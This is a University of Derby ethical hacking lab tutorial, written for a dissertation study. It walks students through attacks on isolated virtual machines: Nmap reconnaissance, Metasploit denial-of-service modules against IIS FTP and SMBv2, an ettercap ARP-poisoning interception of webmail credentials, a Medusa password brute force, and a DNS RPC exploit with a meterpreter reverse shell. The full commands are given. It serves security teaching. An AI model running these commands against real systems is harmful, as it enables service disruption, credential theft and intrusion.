ethical hacking tutorial
TRANSCRIPT
UNIVERSITY OF DERBY
1 | P a g e
Hacking in Action – Tutorial
Background
Firstly, thank you for agreeing to participate in this tutorial. The results of this, as well
as the survey which you will be asked to complete following this session, will contribute
to a dissertation investigating the feasibility of using virtual environments to teach
ethical hacking in educational institutions.
Hacking is a very delicate subject when studying IT security; however it is suggested
that the best defensive measures can be ensured by learning how to infiltrate and
disrupt services,. Therefore this tutorial, although highly simplified, will put you in the
seat of an ethical attacker who is employed to test the defensive measures in place on a
corporate network. The purpose of this is to provide a conceptual understanding of both
the mentality, and techniques used by an ethical hacker.
The tutorial will begin by initiating four virtual machines found on the local computer.
You will be using a well-recognized suite of tools used by professional security
consultants which have been collated to form a Linux distribution known as BackTrack.
Once all of the virtual machines have fully loaded, and you have logged into Back Track,
you will use a tool known as Nmap to conduct reconnaissance on the local network in
order to determine the IP (Internet Protocol) addresses of hosts connected to the local
subnet. Nmap will also be used to discover the Operating System (OS) used by each
host, and their respective services (indicated by banners and port numbers). Once the
local network is mapped, and sufficient knowledge of each host is ascertained, you will
move on to use the Metasploit Framework to conduct four attacks. These attacks will
involve:
Remotely executing a Denial of Service (DoS) attack on a File Transfer Protocol
(FTP) server.
Exploiting an out of bounds function table dereference in Server Message Block
(SMB) requests causing a Blue Screen of Death (BSoD).
Poisoning Address Resolution Protocol (ARP) requests in order to intercept
Secure Sockets Layer (SSL) traffic and obtain a user’s credentials – better known
as a Man-in-the-Middle (MITM) attack.
UNIVERSITY OF DERBY
2 | P a g e
Using a brute force tool to discover the password of an administrator account
and then obtaining root access to that server by exploiting a stack buffer
overflow in the Remote Procedure Call (RPC) interface of the Microsoft Domain
Name System (DNS) service. The root access will then be used to launch a Virtual
Network Computing (VNC) session.
This tutorial is designed to be enjoyable, but also educational, and you are reminded
that it is a criminal offence to repeat these attacks without written authorisation from
the organization, and individuals involved. Finally, due to the nature of this study,
although the virtual machines are completely isolated and are unable to communicate
with the University network or public network, there is monitoring software in use to
ensure that any attempts to breach these security measures are logged.
UNIVERSITY OF DERBY
3 | P a g e
Prelude
To begin, please open the team of virtual machines in VMware Workstation:
1. Click the start “Windows” button.
2. Then go to ‘Computer’ and open the root drive (C :\). Locate and open the
‘StudentVMs’ folder, followed by ‘STUART BUTCHER’ and finally, ‘Hacking_Final’
3. The ‘Hacking_Final’ folder contains all of the virtual machines needed for this
tutorial. Begin the tutorial by opening
double clicking the ‘Hacking_Final.vmtm’
file.
4. You will be greeted with ‘VMware Workstation’ application displaying the
‘Hacking_Final’ team tab. This contains all of the virtual machines.
UNIVERSITY OF DERBY
4 | P a g e
5. With the team open, click ‘Power on this team’ in the ‘Commands’ box. This will start
the boot up process.
The servers will start up in a particular order and take approximately 5
minutes before they are ready for use.
6. The virtual machines are ready for use when they display the ‘Press Ctrl-Alt-Delete
to logon’ screen.
To change between virtual machines, select them in the management panel
above the console. Please be aware, if you are actively using the virtual
machine, i.e. controlling its mouse, you will need to press ‘CTRL + ALT’ to
return to the host.
UNIVERSITY OF DERBY
5 | P a g e
Reconnaissance
The first task is to determine what else is on the local network and what each active
host is responsible for. To do this, we will be using a tool known as Nmap included with
BackTrack.
1. In the VMware Workstation window, take control of the ‘ATTACKER’ virtual
machine by selecting it from the
management panel above the
console.
2. Click the mouse anywhere on the virtual machine console window to take
control of it. You will see a prompt ‘bt login:’ at the bottom of the window. Type
the username ‘attacker’ and press return. You will be asked for the password,
which is ‘attacker’.
You will not be able to see the password input. If you enter it incorrectly,
you will need to repeat the process.
3. Following successful log on, the
graphical user interface will
populate and a shell window will
automatically appear.
UNIVERSITY OF DERBY
6 | P a g e
4. If a shell window does not automatically appear, click the ‘Konsole’ application
icon on the bottom menu bar.
5. Before it is possible to discover other devices on the local subnet, the attacker
needs to know what subnet they belong to. To do this, type ‘ifconfig eth0’ into the
shell window. Press
return.
6. Take a note of the IP address and subnet mask.
7. The local IP address is set to 172.172.1.10 with a subnet mask of 255.255.255.0.
This means that the network address must be 172.172.1.0. Therefore to discover
other devices within the subnet, type ‘sudo nmap –sP 172.172.1.0/24’ into the
shell window. The ‘sudo’ command runs the command with administrative
privileges and you may therefore be prompted for a password. If this happens,
type ‘attacker’. Please note, all commands are case sensitive.
UNIVERSITY OF DERBY
7 | P a g e
8. Nmap has revealed that there are three other clients on the local subnet (one of
the hosts identified is BackTrack itself).
a. 172.172.1.20
b. 172.172.1.100
c. 172.172.1.101
9. With the IP addressing information ascertained, it is now possible to acquire
brief details of what services each host is responsible for. To do this, type ‘sudo
nmap –v –O {Target IP}’
10. From the targeted scan, Nmap reveals the Operating System, network interface
card MAC address, and open ports. The ports highlight the services running on
the target. Repeat the scan for the remaining hosts.
Open Ports
Services used by ports
Network Interface Card MAC
Operating System
Information
UNIVERSITY OF DERBY
8 | P a g e
11. Although there is now a basic understanding of what ports and services are in
use, it is possible to obtain more detailed information by interrogating services.
For example, virtual machine with IP address 172.172.1.101 indicates it is
running Internet Information Services (IIS) to power its web server, but it does
not advertise which version. To discover the version of IIS, type ‘sudo nmap –A –
T4 –F 172.172.1.101’. Repeat the scan on the remaining hosts.
With some FTP servers, it is possible to gain specific system information by
connecting to the server using Telnet and typing ‘SYST’.
UNIVERSITY OF DERBY
9 | P a g e
Attacks
With the knowledge now known about the other hosts on the local subnet, it is possible
to find vulnerabilities on each. Discovered vulnerabilities are publicised on the ‘National
Vulnerability Database’ in an attempt to help administrators protect their systems and
vendors to update their software. Information gathered about each host, and the
potential vulnerabilities available to be exploited are shown below.
172.172.1.20 – VICT-CLI01
This host is using Windows XP SP2 or SP3, which may make it vulnerable to relative
path stack corruption on the Server
service, which could result in
obtaining root access, as described in CVE-2008-4250.
172.172.1.100 – VICT-SRV01
172.172.1.100 appears to be responsible for DNS, Active Directory, web service, and e-
mail. It is also using the Windows Server 2003 Operating System. Therefore, this host
may be vulnerable to an exploit of the RPC interface of the DNS service (CVE-2007-
1748). Additionally, as this host also appears to be responsible for email services, it
could be possible to conduct a Man-In-The-Middle attack on the secure HTTP traffic
when a user logs in to their
mailbox.
UNIVERSITY OF DERBY
10 | P a g e
172.172.1.101 – VICT-SRV-WEB1
This virtual machine appears to have two interesting services; FTP and HTTP. This
suggests that the server is hosting one, or more, webpages as well as providing a
download/upload service of files. Additionally, it is clear that the server is using a
Server 2008 based Operating System.
As this host is using IIS 7.0, it is likely that the FTP server is using version 7.5. Therefore,
it may be vulnerable to a Denial of Service attack as a result of a heap overflow. Further
to this, Nmap has indicated that it is using SMB v2, which is known to be vulnerable to
an array index error when an ampersand character is inputted into the Process ID field.
This triggers an attempted dereference of an out of bounds memory location, and
consequently results in a Blue Screen of Death (CVE-2009-3103).
UNIVERSITY OF DERBY
11 | P a g e
IIS FTP 7.5 DoS
It is possible to terminate the FTP service on a Windows server if they are running
version 7.5. The vulnerability occurs when the FTP server attempts to encode a portion
of overwritten FTP response when a string of 0xFF has been supplied; even past the end
of the heap buffer, resulting in heap buffer overrun. This can be demonstrated in the
Metasploit Framework.
1. Change control of the virtual machines to ‘VICT-SRV-
WEB1’. If control is currently focused on a different
virtual machine, then press ‘CTRL+ALT’. This will
return control to the host computer.
2. Login by hitting ‘CTRL+ALT+INSERT’ and typing
‘H4ckM3!’ as the password.
3. Once logged in, click the ‘Start’ button
and type ‘services.msc’ into the search
bar, followed by hitting the return key.
4. A window containing all system services will be populated. Scroll through the list
of services to find ‘Microsoft FTP Service’. It will show the service as ‘Started’.
5. Change control back to the ‘ATTACKER’ virtual machine and open a shell
window.
UNIVERSITY OF DERBY
12 | P a g e
6. Verify that it is possible to connect to the FTP server by typing ‘ftp 172.172.1.101’.
If the FTP server is running and accepting new connections then it will display
the welcome banner (‘220 Microsoft
FTP Service’) and will prompt for a
login name.
7. Hit return twice and then type ‘quit’.
8. Type ‘sudo msfconsole’. If prompted for a password, enter ‘attacker’. It may take a
short while to load.
9. Select the exploit to be used by typing
‘use auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof’’ followed by hitting the return
key.
10. Next, select the target by typing ‘set RHOST 172.172.1.101’.
11. Launch the attack by typing ‘run’.
UNIVERSITY OF DERBY
13 | P a g e
12. The attack will be launched. A completion message will be returned following the
execution.
13. Change back to ‘VICT-SRV-WEB1’ and refresh the ‘Services’ window. Do not
close the shell window on BackTrack.
14. Find ‘Microsoft FTP Service’ and notice that it is no longer ‘Started’.
The FTP service is no longer running. The attack has been successful.
Server Message Block (SMB) Blue Screen of Death (BSoD)
The reconnaissance also identified that ‘VICT-SRV-WEB1’ uses SMBv2, which has a
known vulnerability. This vulnerability allows an attacker to execute code with system-
level privileges. Failed exploit attempts result in Denial of Service conditions. This
exploit involves purposely failing to execute code with system-level privileges.
1. On BackTrack, from the shell window used previously, type ‘use
auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh’.
If you closed the shell window, open a new window and type ‘sudo
msfconsole’ to start Metasploit again.
2. Set the target by entering ‘set RHOST {Target IP}’.
3. Execute the attack by typing ‘run’.
4. When the attack completes, change to the ‘VICT-SRV-WEB1’ virtual machine.
UNIVERSITY OF DERBY
14 | P a g e
5. The virtual machine should be displaying a Blue Screen of Death. It is possible to
see that the attack dereferenced of an out of bounds memory location by
examining the
error.
6. Return to the ‘ATTACKER’ and type ‘exit’.
The victim will automatically reboot. The attack has been successful.
UNIVERSITY OF DERBY
15 | P a g e
Secure Sockets Layer (SSL) Man-in-the-Middle Attack
Nmap revealed that there is an XP machine on the network. This is most likely a user’s
computer. Nmap also identified 172.172.1.100 as the mail server. Therefore, it is
possible to sniff traffic and poison ARP packets in order to intercept SSL data by acting
as a middle-man.
1. Change control to ‘VICT-CLI01’
and press ‘CTRL+ALT+INSERT’.
Enter ‘thevictim’ as the username
and ‘Password01’ as the
password.
2. Click the ‘Start’ button and open ‘Internet Explorer’.
3. When the page begins to load, a security alert window will appear. Click ‘View
Certificate’.
UNIVERSITY OF DERBY
16 | P a g e
4. The certificate will display three tabs, ‘General’, ‘Details’, and ‘Certification Path’.
Open the ‘Details’ tab.
5. The details tab contains all of the information relating to the site certificate.
Take a note of the ‘Issuer’ and information within the text box below.
6. Click ‘OK’ and then click ‘Yes’ on the security alert window.
UNIVERSITY OF DERBY
17 | P a g e
7. Enter the username ‘thevictim’ and password ‘Password01’. Then click ‘Log On’.
8. The user’s inbox will now be displayed. Click ‘Log Off’ and then close the
window.
UNIVERSITY OF DERBY
18 | P a g e
10. Change control to the ‘ATTACKER’ and from within a shell window type ‘sudo
ettercap –Tq –i eth0 –M arp:remote,oneway /172.172.1.20/ /172.172.1.100/ ’. If
prompted, enter the password ‘attacker’.
11. ARP requests are now being poisoned. Change back to ‘VICT-CLI01’. If the virtual
machine is locked, and press ‘CTRL+ALT+INSERT’ and type ‘thevictim’ for the
username and ‘Password01’ for the password.
12. Click the ‘Start’ button and open
‘Internet Explorer’. When the
security alert window displays,
click ‘View Certificate’.
13. Click the ‘Details’ tab and take a
note of the ‘Issuer’.
14. The difference in issuer
demonstrates that SSL traffic is
being intercepted.
15. Click ‘OK’ and then ‘Yes’ to
continue loading the web page.
UNIVERSITY OF DERBY
19 | P a g e
16. Enter the username ‘thevictim’ and password ‘Password01’ on the login page and
then click ‘Log On’ to load the user’s inbox.
17. Once successfully logged in, change control back to ‘ATTACKER’ and notice the
user details are printed to the display of the shell window.
18. In the shell window, type ‘q’ and the sniffing and
poisoning will terminate.
19. Return to ‘VICT-CLI01’ and click ‘Log off’. If the
virtual machine is locked, enter ‘thevictim’ as the
username and ‘Password01’ as the password.
20. Shut down the ‘VICT-CLI01’ virtual machine by clicking the ‘Start’ button and
then ‘Shut down’. Click ‘OK’ on
the next window.
That concludes the Man-in-the-Middle attack.
UNIVERSITY OF DERBY
20 | P a g e
Domain Name System (DNS) Remote Procedure Call (RPC) Service Transmission
Control Protocol (TCP) Overflow
Nmap identified that server with IP address 172.172.1.100 is not only an e-mail server,
but also responsible for the DNS and Active Directory. Unfortunately, Nmap also
highlighted that the system is relatively unpatched and a known vulnerability to that
particular OS (and service pack) involves causing a buffer overflow in the RPC interface
of the DNS service. This is triggered when a long zone name parameter is supplied that
contains escaped octal strings in a TCP packet. This will allow root access. However, in
order to take control of the servers graphical user interface, the administrator
credentials must be known. For this part, it is assumed that the administrator username
is ‘Administrator’
1. On the ‘ATTACKER’ machine, minimise the shell window if
there is one open.
2. On the desktop, there is a file titled
‘passwords’. Click on it to open it. When
prompted, click ‘Open Session’.
3. A text file containing a list of passwords
will be displayed.
4. Close this window by clicking the ‘X’ at the top right of the window.
5. Restore the shell window, or open a new one if there was not one already open.
UNIVERSITY OF DERBY
21 | P a g e
6. Start the brute forcing tool known as Medusa by typing ‘medusa –h 172.172.1.100
–u Administrator –P ‘/home/attacker/passwords’ –f –F –M smbnt’ followed by the
return key.
7. Medusa will run through all of passwords in the password text file checking to
see if there is a match. When it finds the correct one, it will display ‘SUCCESS’.
8. Take a note of the password and run Metasploit by typing ‘sudo msfconsole’. If
prompted for the password, type
‘attacker’.
9. When Metasploit has loaded, type
‘use exploit/windows/dcerpc/ms07_029_msdns_zonename’ and hit return.
10. Select the payload type to be used by typing ‘set PAYLOAD
windows/meterpreter/reverse_tcp’ followed by the return key.
11. Define the source address to be used in the reverse Transmission Control
Protocol (TCP) by typing ‘set LHOST 172.172.1.10’.
12. Enter the target
address by typing ‘set
RHOST
172.172.1.100’.
13. Type ‘exploit’ to execute the attack.
UNIVERSITY OF DERBY
22 | P a g e
14. If the attack is successful, a session with the server will be established.
15. To view the screen of the server type ‘run getgui –e’.
16. Open a new shell window. When the prompt displays, type ‘rdesktop –u
Adminsitrator –p H4ckM3! 172.172.1.100’ and press return.
17. Once logged in, click ‘Start’ followed by ‘Shut Down’.
UNIVERSITY OF DERBY
23 | P a g e
18. It is not possible to shut the server down
unless a comment is given. In the comment
box, press space and then click ‘OK’.
19. The server will warn that other users will
be disconnected. Click ‘Yes’ to continue.
20. The server will now begin the
shutdown process. Confirm this
by changing control to the ‘VICT-
SRV01’ virtual machine.
When the server shuts down, this attack is completed. In a production environment,
the loss of the e-mail server and domain controller would result in major disruption
to a business.
Cleaning Up
To complete the tutorial, shut down the remaining virtual machines:
1. Take control of ‘VICT-SRV-WEB1’ and pressing ‘CTRL+ALT+INSERT’ to log in.
Use the username ‘Administrator’ and password ‘H4ckM3!’
2. If asked for a reason why the server
unexpectedly shut down, hit the spacebar in
the comments box followed by ‘OK’.
3. Once logged in, click the ‘Start’ button
followed by the right arrow button next to
the padlock icon.
4. When ‘Shut Down’ becomes visible, click it.
UNIVERSITY OF DERBY
24 | P a g e
5. If asked for a reason for shut down, press the spacebar in the comments box and
click ‘OK’.
6. The server will begin the shutdown sequence. Change control to the ‘ATTACKER’
virtual machine.
7. Close any shell windows that may be open, and click the far left icon on menu
bar.
8. When the panel displays, click ‘Log Out’. Another window will
appear. Click ‘Log Out’ on this new window.
9. Once the graphical user interface has closed, click anywhere in
the console window to ensure it is taking keyboard input. Type
‘sudo poweroff’.When prompted, enter the password ‘attacker’.
10. The system will now begin shutting down. When all virtual machines have shut
down, the ‘Hacking_Final’ home tab will be displayed in ‘VMware Workstation’.
Thank you for taking part in this investigation. Please complete the online
survey. The password for the survey is ‘Attacker’.